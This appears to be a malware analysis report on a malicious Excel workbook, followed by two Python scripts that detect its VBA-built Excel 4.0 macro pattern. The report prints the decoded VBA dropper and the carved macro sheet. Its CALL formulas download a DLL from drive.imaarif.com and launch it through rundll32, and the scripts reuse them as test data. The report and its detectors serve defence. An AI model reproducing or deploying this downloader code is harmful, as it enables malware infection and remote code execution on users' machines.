Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c07af723990a19cc…

MALICIOUS

Office (OOXML)

Size: 186.9 KB
Created: 2021-10-04 13:20:34 UTC
Authoring application: Microsoft Excel 14.0300
First seen: 2021-10-14
MD5: e7f800ea895ba59a6f2dd486c4b04287
SHA-1: bdca0cc93e4733dc4926cd7f85a410293d39d2bb
SHA-256: c07af723990a19cc946a35efca0b6035129a74b0b9a62462261b164fb591e628
Risk score: 250

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1105 Ingress Tool Transfer
T1218.011 System Binary Proxy Execution: Rundll32

The sample contains both a VBA project and an Excel 4.0 (XLM) macro sheet. The XLM sheet (xl/macrosheets/sheet1.xml) holds two formulas: `CALL("urlmon", "URLDownloadToFileA", ...)` downloads `https://drive.imaarif.com/logs.php` to `C:\Users\admin\AppData\Local\think-cell\test.dll`, and `CALL("Shell32", "ShellExecuteA", ..., "open", "rundll32", "<dll>, asd")` launches the downloaded DLL through `rundll32`, which calls its `asd` export. The VBA is the builder for that sheet: `Workbook_Open` runs two environment probes (a Yes/No MsgBox and a `NUMBER_OF_PROCESSORS` check), reads the DLL, API, verb and URL strings from column A of the first sheet (cells A11, A17, A29, A44, A56, A74, A92, which is why they show up in the shared-strings text), creates a new macro sheet with `Sheets.Add(Type:=3)` (xlExcel4MacroSheet), concatenates the two CALL formulas into A1 and A2, names A1 `asd` and executes it with `Run "asd"`. Two points matter for triage. First, the short fragments written to other columns ("LL", "mon", "Down", "oFileA", ...) are never read back, and the UCvg offsets derived from the MsgBox result, the CPU count and the error handler only move those decoy writes; the prompt has to be dismissed, but either button continues and neither check gates the download. Second, the carved macro sheet already contains the two finished formulas together with cached results and a LocalAppData path resolved for user `admin`, so the workbook was saved after the macro had been evaluated once; on a victim, `Workbook_Open` rebuilds and re-runs the sheet regardless.

Heuristics (8)

  • Excel 4.0 macro sheet (1 sheet) [critical] OOXML_XLM_MACROSHEET, 1 related finding
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: CALL [critical] OOXML_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet uses formula functions that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA. Here: CALL into urlmon!URLDownloadToFileA and Shell32!ShellExecuteA.
  • LOLBin token sequence in document text [high] SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, ...) within 220 characters of a dangerous flag, command verb, or URL. In HTML/PDF/RTF lures this is a visible "run this" instruction in the body; in macro-laden Office files it is the macro's own string-pool entries appearing adjacent in the extracted text. Here: `rundll32` next to the `open` verb and the DLL path.
  • VBA project inside OOXML [medium] OOXML_VBA, 2 related findings
    Document contains a VBA project (xl/vbaProject.bin).
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    The VBA project defines Workbook_Open, an auto-execute entry point that runs as soon as the workbook is opened with macros enabled; no user action beyond enabling content is required.
  • Environ() call (env variable access) [low] OLE_VBA_ENVIRON
    The VBA reads environment variables with Environ(): LocalAppData (to build the drop path) and NUMBER_OF_PROCESSORS (a common sandbox/VM probe).
  • Suspicious extracted artifact [medium] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • https://drive.imaarif.com/logs.php (in document text: OOXML body / shared strings; also the download target in the XLM CALL formula)
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/main (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac (in document text: OOXML body / shared strings)
    The five schemas.openxmlformats.org / schemas.microsoft.com entries are XML namespace URIs from the sheet markup and appear in every OOXML workbook; they are not network indicators and should not be blocked or pivoted on. The only actionable URL is drive.imaarif.com.

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2482 bytes
SHA-256: d934b5d9ac9eb93528b8f1e3ca002382170f7fa8ea46c958604899f0fcf27393
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim UCvg(2) As Integer

Sub qCqhNpAn()
On Error Resume Next
pYTRxVw = Environ("LocalAppData") & "\think-cell"
ABMoK = pYTRxVw & "\test.dll"
MkDir pYTRxVw
Cells(89 + UCvg(1), 3) = "LL"
Cells(14 + UCvg(0), 5) = "mon"
Cells(52 + UCvg(2), 7) = "Down"
Cells(29 + UCvg(1), 9) = "oFileA"
Cells(29 + UCvg(0), 11) = "ll32"
Cells(82 + UCvg(2), 13) = "llExe"
Cells(100 + UCvg(1), 15) = "run"
Cells(69 + UCvg(0), 17) = "l32"
Cells(49 + UCvg(2), 19) = "s://"
Cells(12 + UCvg(1), 21) = "e."
Cells(93 + UCvg(0), 23) = "ari"
Cells(101 + UCvg(2), 25) = "om"
Cells(27 + UCvg(1), 27) = "ogs."

oimOh = Cells(11, 1).Value
dUatQ = Cells(17, 1).Value
Yhrq = Cells(29, 1).Value
ffmMGR = Cells(44, 1).Value
wwpSsPrB = Cells(56, 1).Value
rIszZp = Cells(74, 1).Value
YWFdjkjt = Cells(92, 1).Value

Sheets.Add(Type:=3, After:=Sheets(1)).Name = "Sheet2"
Cells(1, 1).Name = "asd"
Cells(1, 1) = "=" & oimOh & "(""" & dUatQ & """, """ & Yhrq & """, ""JJCCJJ"", 0, """ & YWFdjkjt & """, """ & ABMoK & """, 0, 0)"
Cells(2, 1) = "=" & oimOh & "(""" & ffmMGR & """, """ & wwpSsPrB & """, ""JJCCCJJ"", 0, ""open"", """ & rIszZp & """, """ & ABMoK & ", asd"")"
Sheet1.Activate
Run "asd"

End Sub

Sub BOhgZ()
Dim DBNbFF, jRlt
DBNbFF = "Do you want to continue?" & vbNewLine & "Click Yes to Continue"
jRlt = vbYesNo + vbQuestion + vbDefaultButton2
UCvg(2) = MsgBox(DBNbFF, jRlt) * 11
Call qCqhNpAn
End Sub

Sub QwSkaLb()
If Environ("NUMBER_OF_PROCESSORS") < 4 Then
UCvg(1) = 117
Else
UCvg(1) = UCvg(1) + 82
End If
Call BOhgZ
End Sub

Sub Workbook_Open()
On Error GoTo PHZLKF
Application.DisplayAlerts = False
  Dim rdZBxwb As Worksheet
  Set rdZBxwb = Worksheets(2)
  rdZBxwb.Delete
Application.DisplayAlerts = True
rdZBxwb.Cells(1, 1) = "Hello World"
UCvg(0) = 100
Call QwSkaLb
Exit Sub
PHZLKF:
UCvg(0) = UCvg(0) + 30
Call QwSkaLb
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
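Added example (not part of the report, the sandbox or the sample): a stdlib-only Python scanner for the pattern that makes this VBA work, namely an auto-execute entry point, a macro sheet created at runtime with `Sheets.Add(Type:=3)` (xlExcel4MacroSheet), a formula string assembled into a cell, and that cell executed by name with `Run`. The VBA excerpt is copied from the listing above and trimmed (nothing is altered); the indicator names, the regexes and the verdict logic are this example's own, and the benign module is constructed for contrast.

```python
from __future__ import annotations

import re

# Excerpt of the decoded macros.bas listed above, trimmed to the statements the scanner
# keys on. Omitted: the attribute header, the remaining decoy cell writes and the MsgBox sub.
VBA_EXCERPT = r'''
Sub qCqhNpAn()
On Error Resume Next
pYTRxVw = Environ("LocalAppData") & "\think-cell"
ABMoK = pYTRxVw & "\test.dll"
MkDir pYTRxVw
Cells(89 + UCvg(1), 3) = "LL"
Cells(14 + UCvg(0), 5) = "mon"
Cells(52 + UCvg(2), 7) = "Down"
oimOh = Cells(11, 1).Value
dUatQ = Cells(17, 1).Value
Sheets.Add(Type:=3, After:=Sheets(1)).Name = "Sheet2"
Cells(1, 1).Name = "asd"
Cells(1, 1) = "=" & oimOh & "(""" & dUatQ & """, """ & Yhrq & """, ""JJCCJJ"", 0, """ & YWFdjkjt & """, """ & ABMoK & """, 0, 0)"
Sheet1.Activate
Run "asd"
End Sub

Sub QwSkaLb()
If Environ("NUMBER_OF_PROCESSORS") < 4 Then
UCvg(1) = 117
Else
UCvg(1) = UCvg(1) + 82
End If
Call BOhgZ
End Sub

Sub Workbook_Open()
On Error GoTo PHZLKF
UCvg(0) = 100
Call QwSkaLb
Exit Sub
PHZLKF:
UCvg(0) = UCvg(0) + 30
Call QwSkaLb
End Sub
'''

# Constructed benign module for contrast: an auto-exec sub alone is not the pattern.
BENIGN_VBA = 'Sub Workbook_Open()\nMsgBox "Welcome"\nEnd Sub\n'

# Cells(...) with one level of nested parentheses, e.g. Cells(89 + UCvg(1), 3)
CELLS = r"Cells\((?:[^()]|\([^()]*\))*\)"

# Indicator name -> regex over the VBA source; findall counts the hits.
INDICATORS = {
    "auto_exec": re.compile(r"^\s*(?:Private\s+|Public\s+)?Sub\s+(?:Workbook_Open|Auto_Open|Document_Open|AutoOpen|AutoExec)\b", re.M | re.I),
    "xlm_sheet_created": re.compile(r"Sheets\.Add\((?:[^()]|\([^()]*\))*?Type:=\s*(?:3|4|xlExcel4(?:Intl)?MacroSheet)\b", re.I),
    "formula_injected": re.compile(CELLS + r'\s*=\s*"="\s*&', re.I),      # cell = "=" & ...
    "xlm_run": re.compile(r'\b(?:Application\.)?Run\s+"[^"]+"', re.I),
    "cell_fragment_write": re.compile(CELLS + r'\s*=\s*"[^"=][^"]{0,7}"', re.I),  # short literal writes
    "cell_read": re.compile(CELLS + r"\.Value", re.I),
    "env_probe": re.compile(r'Environ\("NUMBER_OF_PROCESSORS"\)', re.I),
    "appdata_drop": re.compile(r'Environ\("(?:LocalAppData|AppData|Temp)"\)', re.I),
}
NAMED_CELL_RE = re.compile(CELLS + r'\.Name\s*=\s*"([^"]+)"', re.I)
RUN_TARGET_RE = re.compile(r'\b(?:Application\.)?Run\s+"([^"]+)"', re.I)


def scan_vba(src: str) -> dict:
    """Count indicator hits and decide whether the VBA builds and runs an XLM sheet."""
    counts = {name: len(rx.findall(src)) for name, rx in INDICATORS.items()}
    named_cells = NAMED_CELL_RE.findall(src)
    run_targets = RUN_TARGET_RE.findall(src)
    # Decisive chain: auto-exec entry point, macro sheet created at runtime, a formula
    # string injected into a cell, and Run targeting a cell that was named in the same code.
    builds_xlm = bool(counts["auto_exec"] and counts["xlm_sheet_created"]
                      and counts["formula_injected"] and set(run_targets) & set(named_cells))
    return {
        "indicators": counts,
        "named_cells": named_cells,
        "run_targets": run_targets,
        "verdict": "vba-builds-and-runs-xlm" if builds_xlm else "no-xlm-builder-pattern",
    }


if __name__ == "__main__":
    import json
    print(json.dumps(scan_vba(VBA_EXCERPT), indent=2))
    print(scan_vba(BENIGN_VBA)["verdict"])
```

On a real sample, feed `scan_vba()` the olevba output (`olevba --decode sample.xlsx` or the `macros.bas` artifact above). The named-cell/Run correlation is deliberately required for the verdict: `Workbook_Open` plus `Environ()` on their own are common in benign workbooks, while a runtime-created macro sheet whose named cell is immediately executed is not.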
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 25088 bytes
SHA-256: 250850f6f0a0c8bf8282479f56a671eccc45aafe62436f1622f44fee6a9f8463
xlm_sheet_00.xml | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 1171 bytes
SHA-256: 3c0026e2e1097268b406538938b952c4fef9a93db5b6403347d5fd97268a2074
Detection
ClamAV: no threats found
Obfuscation or payload: likely. The carved artifact contains 2 shell/COM execution tokens (the two CALL formulas are the obvious candidates).
Cached results saved with the formulas: A1 holds -2146697208, i.e. HRESULT 0x800C0008 (INET_E_DOWNLOAD_FAILURE), so the download failed when the sheet was last evaluated; A2 holds 42, which is greater than 32 and therefore a successful ShellExecuteA return (rundll32 was started even though no DLL had been fetched). Cached values describe the last evaluation before the file was saved, not what happens on a victim, where Workbook_Open rebuilds the sheet and runs it again.
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
               xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
               xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
               xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
               mc:Ignorable="x14ac"
               xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac">
  <dimension ref="A1:A2"/>
  <sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A1">
        <f>CALL("urlmon", "URLDownloadToFileA", "JJCCJJ", 0, "https://drive.imaarif.com/logs.php", "C:\Users\admin\AppData\Local\think-cell\test.dll", 0, 0)</f>
        <v>-2146697208</v>
      </c>
    </row>
    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A2">
        <f>CALL("Shell32", "ShellExecuteA", "JJCCCJJ", 0, "open", "rundll32", "C:\Users\admin\AppData\Local\think-cell\test.dll, asd")</f>
        <v>42</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
</xm:macrosheet>
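Added example (not part of the report, the sandbox or the sample): a stdlib-only Python triage that reproduces the XLM-related checks from the heuristics list (OOXML_XLM_MACROSHEET, OOXML_XLM_DANGEROUS_FN, EMBEDDED_URL, SE_LOLBIN_RUN_COMMAND) against the carved macro sheet. It finds macro sheets by their content type in `[Content_Types].xml` rather than by path, parses CALL/EXEC/REGISTER/FORMULA formulas while splitting arguments with quoted commas correctly (the `"<dll>, asd"` rundll32 argument would otherwise be cut in two), decodes the cached `<v>` return values, extracts URLs, and flags LOLBin names near a verb or URL. The macro sheet XML is the artifact above, trimmed to `sheetData`; `[Content_Types].xml` and `xl/sharedStrings.xml` are constructed here because the report does not list them, and the whole workbook is assembled in memory so the script runs offline.

```python
from __future__ import annotations

import csv
import io
import re
import zipfile
import xml.etree.ElementTree as ET

NS_MAIN = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
NS_CT = "{http://schemas.openxmlformats.org/package/2006/content-types}"
XLM_CONTENT_TYPE = "application/vnd.ms-excel.macrosheet+xml"
DANGEROUS_XLM = {"CALL", "EXEC", "REGISTER", "FORMULA"}
KNOWN_HRESULTS = {0x800C0008: "INET_E_DOWNLOAD_FAILURE", 0x800C0005: "INET_E_RESOURCE_NOT_FOUND"}
LOLBIN_RE = re.compile(r"\b(rundll32|regsvr32|mshta|powershell|cmd|wscript|cscript|certutil)\b", re.I)
URL_RE = re.compile(r"""https?://[^\s"',]+""")
VERB_RE = re.compile(r"\bopen\b|\bbypass\b|-enc\w*|/c\b", re.I)

# MACROSHEET_XML is xl/macrosheets/sheet1.xml from the report (trimmed to sheetData).
# The other two parts are constructed for this example; the report does not list them.
MACROSHEET_XML = rb'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"><sheetData>
<row r="1"><c r="A1"><f>CALL("urlmon", "URLDownloadToFileA", "JJCCJJ", 0, "https://drive.imaarif.com/logs.php", "C:\Users\admin\AppData\Local\think-cell\test.dll", 0, 0)</f><v>-2146697208</v></c></row>
<row r="2"><c r="A2"><f>CALL("Shell32", "ShellExecuteA", "JJCCCJJ", 0, "open", "rundll32", "C:\Users\admin\AppData\Local\think-cell\test.dll, asd")</f><v>42</v></c></row>
</sheetData></xm:macrosheet>'''
CONTENT_TYPES_XML = b'''<?xml version="1.0" encoding="UTF-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/></Types>'''
SHARED_STRINGS_XML = b'''<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><si><t>CALL</t></si><si><t>urlmon</t></si><si><t>rundll32</t></si><si><t>https://drive.imaarif.com/logs.php</t></si></sst>'''


def build_sample_xlsx() -> bytes:
    """Assemble the parts into a minimal in-memory OOXML zip (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES_XML)
        z.writestr("xl/macrosheets/sheet1.xml", MACROSHEET_XML)
        z.writestr("xl/sharedStrings.xml", SHARED_STRINGS_XML)
    return buf.getvalue()


def interpret_cached_value(api: str, value: str | None) -> str:
    """Explain the <v> result Excel cached next to a CALL formula when the sheet was last evaluated."""
    if value is None:
        return "no cached value"
    n = int(float(value))
    if api == "URLDownloadToFileA":          # returns an HRESULT, stored as a signed 32-bit number
        hr = n & 0xFFFFFFFF
        if hr == 0:
            return "S_OK"
        name = KNOWN_HRESULTS.get(hr)
        return f"failed, HRESULT 0x{hr:08X}" + (f" ({name})" if name else "")
    if api == "ShellExecuteA":               # returns an HINSTANCE; > 32 means the process started
        return f"succeeded (HINSTANCE {n} > 32)" if n > 32 else f"failed (code {n})"
    return str(n)


def split_formula_args(argstr: str) -> list[str]:
    """Split XLM formula arguments, honouring quoted strings that contain commas."""
    return next(csv.reader([argstr], skipinitialspace=True))


def triage(xlsx_bytes: bytes) -> dict:
    out = {"xlm_sheets": [], "calls": [], "urls": [], "lolbin_hits": []}
    texts: list[str] = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        # Macro sheets are declared by content type, so check [Content_Types].xml, not file names.
        ct = ET.fromstring(z.read("[Content_Types].xml"))
        for ov in ct.iter(NS_CT + "Override"):
            if ov.get("ContentType") == XLM_CONTENT_TYPE:
                out["xlm_sheets"].append(ov.get("PartName").lstrip("/"))
        # Walk every cell formula in each macro sheet and pick out the Win32-reaching functions.
        for part in out["xlm_sheets"]:
            for c in ET.fromstring(z.read(part)).iter(NS_MAIN + "c"):
                f, v = c.find(NS_MAIN + "f"), c.find(NS_MAIN + "v")
                if f is None or not f.text:
                    continue
                texts.append(f.text)
                m = re.match(r"\s*(\w+)\s*\((.*)\)\s*$", f.text, re.S)
                if not m or m.group(1).upper() not in DANGEROUS_XLM:
                    continue
                args = split_formula_args(m.group(2))
                call = {"cell": c.get("r"), "fn": m.group(1).upper(), "args": args}
                if call["fn"] == "CALL" and len(args) >= 3:
                    # CALL(dll, api, type_string, arg1, ...): name the import, keep the real args
                    call.update(dll=args[0], api=args[1], args=args[3:],
                                cached=interpret_cached_value(args[1], v.text if v is not None else None))
                out["calls"].append(call)
        # Shared strings hold what the VBA reads back from cells (DLL/API names, the URL).
        if "xl/sharedStrings.xml" in z.namelist():
            texts += [t.text for t in ET.fromstring(z.read("xl/sharedStrings.xml")).iter(NS_MAIN + "t") if t.text]
    blob = "\n".join(texts)
    out["urls"] = sorted(set(URL_RE.findall(blob)))
    # LOLBin name within 220 characters of a verb/flag or a URL, as SE_LOLBIN_RUN_COMMAND describes.
    hits = set()
    for m in LOLBIN_RE.finditer(blob):
        window = blob[max(0, m.start() - 220): m.end() + 220]
        if URL_RE.search(window) or VERB_RE.search(window):
            hits.add(m.group(1).lower())
    out["lolbin_hits"] = sorted(hits)
    return out


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample_xlsx()), indent=2))
```

For a real file, pass `open(path, "rb").read()` to `triage()`. Content-type detection is what keeps this robust: renaming a macro sheet part or moving it out of `xl/macrosheets/` does not change its `Override` entry, whereas a path-based check would miss it.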